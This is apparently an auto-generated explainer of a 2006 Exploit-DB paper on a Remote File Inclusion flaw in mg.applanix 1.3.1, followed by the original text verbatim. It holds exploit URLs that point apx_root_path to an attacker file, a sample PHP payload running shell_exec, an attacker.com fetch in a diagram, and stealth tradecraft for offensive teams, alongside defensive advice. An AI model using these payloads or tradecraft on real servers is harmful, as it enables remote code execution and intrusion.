Understanding Remote File Inclusion in mg.applanix 1.3.1

What this paper is

This paper details a Remote File Inclusion (RFI) vulnerability found in version 1.3.1 of the mg.applanix web application. The author, v1per-haCker, demonstrates how an attacker can exploit this vulnerability to include and execute arbitrary files from a remote server. This allows for potential code execution on the target web server.

Simple technical breakdown

The mg.applanix application, specifically its PHP scripts, fails to properly sanitize user-supplied input for the apx_root_path parameter. This parameter is intended to specify a root path for application files. However, because the application doesn't validate this input, an attacker can provide a URL pointing to a remote file (like a PHP script or a text file containing malicious code) instead of a local path. When the application then tries to include this remote file, it effectively downloads and executes the content from the attacker's server.

Complete code and payload walkthrough

The provided paper does not contain any executable code or shellcode in the traditional sense. Instead, it focuses on identifying the vulnerable parameter and demonstrating how to exploit it through crafted URLs.

The core of the exploit lies in manipulating the apx_root_path parameter within specific PHP scripts of the mg.applanix application.

Here's a breakdown of the exploit examples provided:

• http://localhost/path/act/act_check_access.php?apx_root_path=http://EvElCoDe.txt?

  • http://localhost/path/act/act_check_access.php: This is the vulnerable script on the target server.
  • apx_root_path=: This is the parameter that is vulnerable to RFI.
  • http://EvElCoDe.txt?: This is the attacker-controlled URL. The attacker would host a file named EvElCoDe.txt (or any other name) on their own web server. This file would contain the malicious PHP code they want to execute on the target. The trailing ? is often used to terminate the parameter value if the script itself might append further query parameters.

• http://localhost/path/dsp/dsp_form_booking_ctl.php?apx_root_path=http://EvElCoDe.txt?

  • Similar to the above, but targets a different script: dsp_form_booking_ctl.php.

• http://localhost/path/dsp/dsp_bookings.php?apx_root_path=http://EvElCoDe.txt?

  • Again, a similar exploit targeting another script: dsp_bookings.php.

Explanation of the RFI mechanism:

1. Vulnerable Script: The PHP scripts (act_check_access.php, dsp_form_booking_ctl.php, dsp_bookings.php) likely use a function like include() or require() to load content based on the apx_root_path parameter.
2. Input Manipulation: An attacker provides a URL (http://EvElCoDe.txt?) as the value for apx_root_path.
3. Remote Inclusion: The PHP interpreter, when encountering include('http://EvElCoDe.txt?'), attempts to fetch the content from the specified remote URL.
4. Code Execution: If the remote file (EvElCoDe.txt) contains valid PHP code, the target server will execute it as if it were a local script.

Mapping of code fragment/block -> practical purpose:

• apx_root_path=http://EvElCoDe.txt?: This is the exploit payload. It's not code in the traditional sense but a crafted URL that tricks the vulnerable PHP script into including and executing remote content. The "code" is what resides in EvElCoDe.txt on the attacker's server.

Shellcode/Payload Segments:

There are no explicit shellcode bytes provided in this paper. The "payload" is the content of the remote file (EvElCoDe.txt) that the attacker hosts. This file would typically contain PHP code.

Example of EvElCoDe.txt content (attacker-hosted):

<?php
// This is a simple example of malicious PHP code
// that could be placed in EvElCoDe.txt
echo "<h1>Hacked!</h1>";
echo "<p>System information:</p>";
echo "<pre>";
// Execute a system command and display output
echo shell_exec("uname -a");
echo "</pre>";
// You could also include a web shell here
?>

Practical details for offensive operations teams

• Required Access Level: Low. This is a remote vulnerability exploitable via HTTP requests. No prior authentication or local access is typically required.
• Lab Preconditions:
  • A target web server running mg.applanix version 1.3.1 or a similarly vulnerable version.
  • The target server must have PHP installed and configured to allow remote file inclusions (e.g., allow_url_fopen enabled in php.ini).
  • An attacker-controlled web server to host the malicious payload (e.g., a PHP script or a text file with PHP code).
• Tooling Assumptions:
  • A web browser for manual testing or a web vulnerability scanner.
  • Tools like curl or wget for crafting and sending HTTP requests.
  • A simple web server (e.g., Python's http.server, Apache, Nginx) to host the attacker's payload.
• Execution Pitfalls:
  • allow_url_fopen disabled: If allow_url_fopen is disabled in the target server's php.ini configuration, the PHP interpreter will not be able to fetch remote files via include() or require(), rendering this RFI exploit ineffective.
  • Input Sanitization/Validation: Later versions of mg.applanix or custom WAF rules might sanitize or validate the apx_root_path parameter, preventing the inclusion of external URLs.
  • Firewall Restrictions: Network firewalls on the target or attacker's side might block the HTTP request from the target server to the attacker's server.
  • Payload Encoding/Obfuscation: If basic RFI is blocked, attackers might need to use more advanced techniques like LFI-to-RFI chains or obfuscate their payloads.
  • Trailing Characters: The trailing ? in the exploit URL is important. If the vulnerable script appends its own parameters, the ? ensures the attacker's URL is correctly terminated. Without it, the script might try to include http://EvElCoDe.txt?some_other_param=value, which would likely fail.
• Tradecraft Considerations:
  • Reconnaissance: Identify the specific version of mg.applanix being used. Look for common vulnerable parameters in web applications.
  • Payload Hosting: Host the malicious payload on a reliable server that is accessible from the target. Consider using a domain that doesn't immediately raise suspicion.
  • Stealth: Avoid using obvious payload filenames like shell.php. Use more innocuous names.
  • Post-Exploitation: Once code execution is achieved, the immediate goal is often to establish persistence, escalate privileges, or exfiltrate data. The RFI exploit itself is just the initial entry vector.

Where this was used and when

• Context: This vulnerability was discovered and published in 2006. It targets a specific web application (mg.applanix) used for managing appointments or bookings.
• Timeframe: The exploit was published on November 17, 2006. This type of RFI vulnerability was common in PHP applications of that era due to less stringent input validation practices.

Defensive lessons for modern teams

• Input Validation is Crucial: Always validate and sanitize all user-supplied input, especially when it's used in file operations or dynamic code execution. For file paths, ensure they point to expected local files and do not contain URL schemes.
• Disable allow_url_fopen and allow_url_include: In php.ini, it's highly recommended to disable allow_url_fopen and allow_url_include unless absolutely necessary for specific, controlled functionalities. This prevents PHP from fetching remote files via include(), require(), fopen(), etc.
• Web Application Firewalls (WAFs): Implement and maintain WAFs that can detect and block common RFI patterns in HTTP requests.
• Regular Patching and Updates: Keep all web applications and their dependencies (like PHP itself) updated to the latest secure versions.
• Secure Coding Practices: Train developers on secure coding principles, including the dangers of insecure file handling and dynamic code execution.
• Least Privilege: Ensure web server processes run with the minimum necessary privileges to limit the impact of a successful compromise.

ASCII visual (if applicable)

+-----------------+      +----------------------+      +--------------------+
| Attacker's      |----->| Target Web Server    |----->| Attacker's Server  |
| Machine         |      | (mg.applanix v1.3.1) |      | (hosting payload)  |
| (Crafts Request)|      |                      |      |                    |
+-----------------+      +----------------------+      +--------------------+
       |                         |
       | HTTP Request            | Fetch Payload
       | (e.g., GET /path/act/   | (e.g., GET /EvElCoDe.txt)
       | act_check_access.php?  |
       | apx_root_path=http://  |
       | attacker.com/payload.php)|
       |                         |
       +-------------------------+
                 |
                 | PHP Interpreter on Target
                 | executes fetched payload
                 |

This diagram illustrates the flow: the attacker crafts a request targeting the vulnerable web application. The web application, due to the RFI vulnerability, then makes a request to the attacker's server to fetch the payload. Finally, the target server's PHP interpreter executes the fetched payload.

Source references

• PAPER ID: 2794
• PAPER TITLE: mg.applanix 1.3.1 - 'apx_root_path' Remote File Inclusion
• AUTHOR: v1per-haCker
• PUBLISHED: 2006-11-17
• PAPER URL: https://www.exploit-db.com/papers/2794
• RAW URL: https://www.exploit-db.com/raw/2794

Original Exploit-DB Content (Verbatim)

#########################################################################################
###################################v1per-haCker##########################################
######################How I Can lives Without FooL Programmer!###########################
#########################################################################################
#=======================================================================================#
#___________________________________mg.applanix (RFI)___________________________________#
#=======================================================================================#
# Information:-										#
#											#
# Scripts: mg.applanix									#
# download : http://freshmeat.net/redir/applanix/38915/url_zip/mg.applanix_1.3.1.zip	#
# Version : 1.3.1									#
# Dork & vuln : download script and think :)						#
#											#
#=======================================================================================#
# Exploit :										#
#											#
#http://localhost/path/act/act_check_access.php?apx_root_path=http://EvElCoDe.txt?	#
#http://localhost/path/dsp/dsp_form_booking_ctl.php?apx_root_path=http://EvElCoDe.txt?	#
#http://localhost/path/dsp/dsp_bookings.php?apx_root_path=http://EvElCoDe.txt?		#
#											#
#=======================================================================================#
# Discoverd By : v1per-haCker								#
#											#
# Conatact : v1per-hacker[at]hotmail.com						#
#											#
# XP10_hackEr Team		>>	www.xp10.com					#
# SpeciaL PoweR SecuritY TeaM	>>	www.specialpower.org				#
#											#
# Greetz to :	| abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL  | 		#
#		| ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB |		#
#		| metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota   |		#
#		| MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO  | 		#
#		|  MuhaciR  |Skrmhcr-GVinux | Jean | fucker_net | Sir-ToTTi |		#
#	    										#
# Thanks >>	/str0ke	& www.milw0rm.com & www.google.com				#
#=======================================================================================#
#########################################################################################
#################################L0ve is L1fe W0und3r####################################
#########################################################################################

# milw0rm.com [2006-11-17]